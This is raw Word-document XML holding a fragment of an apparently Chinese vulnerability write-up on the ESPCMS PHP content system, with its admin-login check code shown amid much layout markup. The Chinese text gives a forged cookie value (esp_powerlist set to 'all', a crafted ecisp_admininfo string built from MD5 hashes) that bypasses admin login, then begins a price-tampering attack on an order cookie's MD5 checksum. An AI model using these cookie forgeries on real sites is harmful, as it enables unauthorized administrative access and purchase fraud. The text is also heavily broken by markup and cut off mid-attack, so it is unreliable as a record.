                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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(empty($this-&gt;esp_username) ||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empty(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;esp_adminuserid) || md5(admin_AGENT) !=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$this-&gt;esp_</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">useragent || </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>admin_ClassURL) !=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$this-&gt;esp_softurl) {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$condition = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="579" w:right="50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$condition = 1;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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1263" w:firstLine="39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(empty($this-&gt;esp_username) || empty($this-&gt;esp_adminuserid) || md5(admin_ClassURL) != $this-&gt;esp_softurl) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$condition = 0;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="579" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>} else {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$condition = 1;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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($condition == 0) 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404" w:firstLine="398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($this-&gt;fun-&gt;accept('archive', 'R') != 'adminuser' &amp;&amp; $this-&gt;fun-&gt;accept('action', 'R') != 'login') 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6789" style="width:337.75pt;height:246.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,4934">
            <v:rect id="_x0000_s6896" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6895" style="position:absolute;left:185;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6894" style="position:absolute;left:285;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6893" style="position:absolute;left:385;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6892" style="position:absolute;left:485;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6891" style="position:absolute;left:585;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6890" style="position:absolute;left:685;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6889" style="position:absolute;left:785;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6888" style="position:absolute;left:885;top:248;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6887" style="position:absolute;left:985;top:248;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6886" style="position:absolute;left:3033;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6885" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6884" style="position:absolute;left:185;top:574;width:5181;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6883" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6882" style="position:absolute;left:185;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6881" style="position:absolute;left:285;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6880" style="position:absolute;left:385;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6879" style="position:absolute;left:485;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6878" style="position:absolute;left:585;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6877" style="position:absolute;left:685;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6876" style="position:absolute;left:785;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6875" style="position:absolute;left:885;top:900;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6874" style="position:absolute;left:985;top:900;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6873" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6872" type="#_x0000_t75" style="position:absolute;left:185;top:1226;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6871" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6870" style="position:absolute;left:185;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6869" style="position:absolute;left:305;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6868" style="position:absolute;left:426;top:1552;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6867" style="position:absolute;left:908;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6866" style="position:absolute;left:1028;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6865" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6864" style="position:absolute;left:185;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6863" style="position:absolute;left:285;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6862" style="position:absolute;left:385;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6861" style="position:absolute;left:485;top:1878;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6860" style="position:absolute;left:585;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6859" style="position:absolute;left:826;top:1878;width:112;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6858" style="position:absolute;left:938;top:1878;width:1326;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6857" style="position:absolute;left:2264;top:1878;width:112;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6856" style="position:absolute;left:2376;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6855" style="position:absolute;left:2617;top:1878;width:112;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6854" style="position:absolute;left:2729;top:1878;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6853" style="position:absolute;left:2850;top:1878;width:112;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6852" style="position:absolute;left:2962;top:1878;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6851" style="position:absolute;left:3203;top:1878;width:113;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6850" style="position:absolute;left:3316;top:1878;width:3254;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6849" style="position:absolute;left:6570;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6848" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6847" style="position:absolute;left:185;top:2204;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6846" style="position:absolute;left:667;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6845" style="position:absolute;left:770;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6844" style="position:absolute;left:1011;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6843" style="position:absolute;left:1114;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6842" style="position:absolute;left:1355;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6841" style="position:absolute;left:1458;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6840" style="position:absolute;left:1699;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6839" style="position:absolute;left:1802;top:2204;width:3494;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6838" style="position:absolute;left:5296;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6837" style="position:absolute;left:5399;top:2204;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6836" style="position:absolute;left:5881;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6835" style="position:absolute;left:5984;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6834" style="position:absolute;left:6225;top:2204;width:103;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6833" style="position:absolute;left:6328;top:2204;width:242;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6832" style="position:absolute;left:6570;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6831" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6830" style="position:absolute;left:185;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6829" style="position:absolute;left:426;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6828" style="position:absolute;left:546;top:2530;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6827" style="position:absolute;left:3920;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6826" style="position:absolute;left:4041;top:2530;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6825" style="position:absolute;left:4523;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6824" style="position:absolute;left:4643;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6823" style="position:absolute;left:4884;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6822" style="position:absolute;left:5005;top:2530;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6821" style="position:absolute;left:5366;top:2530;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6820" style="position:absolute;left:5487;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6819" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6818" style="position:absolute;left:185;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6817" style="position:absolute;left:285;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6816" style="position:absolute;left:385;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6815" style="position:absolute;left:485;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6814" style="position:absolute;left:585;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6813" style="position:absolute;left:685;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6812" style="position:absolute;left:785;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6811" style="position:absolute;left:885;top:2856;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6810" style="position:absolute;left:985;top:2856;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6809" style="position:absolute;left:3033;top:2856;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6808" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6807" style="position:absolute;left:185;top:3182;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6806" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6805" style="position:absolute;left:185;top:3508;width:3012;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6804" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6803" style="position:absolute;left:185;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6802" style="position:absolute;left:285;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6801" style="position:absolute;left:385;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6800" style="position:absolute;left:485;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6799" style="position:absolute;left:585;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6798" style="position:absolute;left:685;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6797" style="position:absolute;left:785;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6796" style="position:absolute;left:885;top:3834;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6795" style="position:absolute;left:985;top:3834;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6794" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6793" type="#_x0000_t75" style="position:absolute;left:185;top:4160;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6792" style="position:absolute;left:5;top:4423;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6791" style="position:absolute;left:185;top:4486;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6790" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:4929" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="21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180" w:right="50" w:firstLine="79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header(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'location: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index.php?archive=adminuser&amp;action=login');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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} else {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50" w:firstLine="39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($condition == 1 &amp;&amp;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$this-&gt;fun-&gt;accept('point', 'R')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==</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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''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&amp;&amp;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$this-&gt;fun-&gt;accept('</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>archive',</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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'R')</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-19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==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''</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="980" w:right="1127" w:hanging="80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&amp;&amp; $this-&gt;fun-&gt;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accept(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'action', 'R') == '') { header('location:</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2" w:line="391" w:lineRule="auto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index.php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?archive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=management&amp;action=tab&amp;loadfun=mang </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>ercenter&amp;out=tabcenter');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要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>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的将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>esp_powerlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>，将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>ecisp_admininfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设为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类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="68"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'1|hym|12345678901234567890123456789012|'.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>md5(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>'Mozilla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="83" w:line="302" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/5.0 (Windows NT 6.1; WOW64; rv</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>:18.0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">) Gecko/20100101 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Firefox/18.0').'|1|management|'.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>md5(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">'http://**.**.**.**/esp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>cms/adminsoft'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的结构，去登陆后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>台就可以了，此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有掌声。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="6304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229992</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4087030" cy="1185481"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9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30" cy="1185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int="eastAsia"/>
        </w:rPr>
        <w:t>首先注册会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>员购</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="576" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>折扣前和折扣后的价格都是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>3200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以明文是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>md5(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>'3200|3200')='38a7a5650e6296b180c88f6592486fbf'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="576" w:lineRule="auto"/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6"/>
        <w:spacing w:before="92" w:line="304" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>密文通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看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 xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的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 xml:space="preserve">ecisp_order_sncode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到：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  <w:w w:val="95"/>
        </w:rPr>
